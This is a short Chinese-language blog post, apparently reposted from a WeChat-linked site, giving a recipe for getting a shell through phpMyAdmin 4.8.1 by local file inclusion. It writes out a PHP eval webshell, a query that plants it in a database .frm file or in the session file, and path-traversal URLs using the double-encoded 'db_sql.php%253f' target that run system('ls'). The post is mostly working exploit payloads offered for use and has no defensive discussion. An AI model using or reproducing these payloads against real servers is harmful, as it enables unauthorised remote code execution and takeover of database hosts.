phpmyadmin4.8.1后台getshell
包含文件进行getshell
姿势:
①
建立数据库的,新建表,字段名为一句话木马。
会生成对应的数据库文件,相应文件的路径查看
select @@datadir;
这个样子就会在/var/lib/mysql/hack/hack.frm的文件里包含着一句话木马的字段。
?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/hack/hack.frm
权限不够,
扫描二维码关注公众号,回复:
4497485 查看本文章
不过这个再linux下面倒是很简单,不用考虑权限。
②
查询语句(一句话木马),
执行查询
select '<?php @eval($_GET["code"])?>'
之后会保存在session文件里。
session文件:
/var/lib/php/sessions/sess_你的SESSION ID
包含payload:
?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_6ker17rs59cuu39e6rfdpdrcaoto5116&a=system("ls");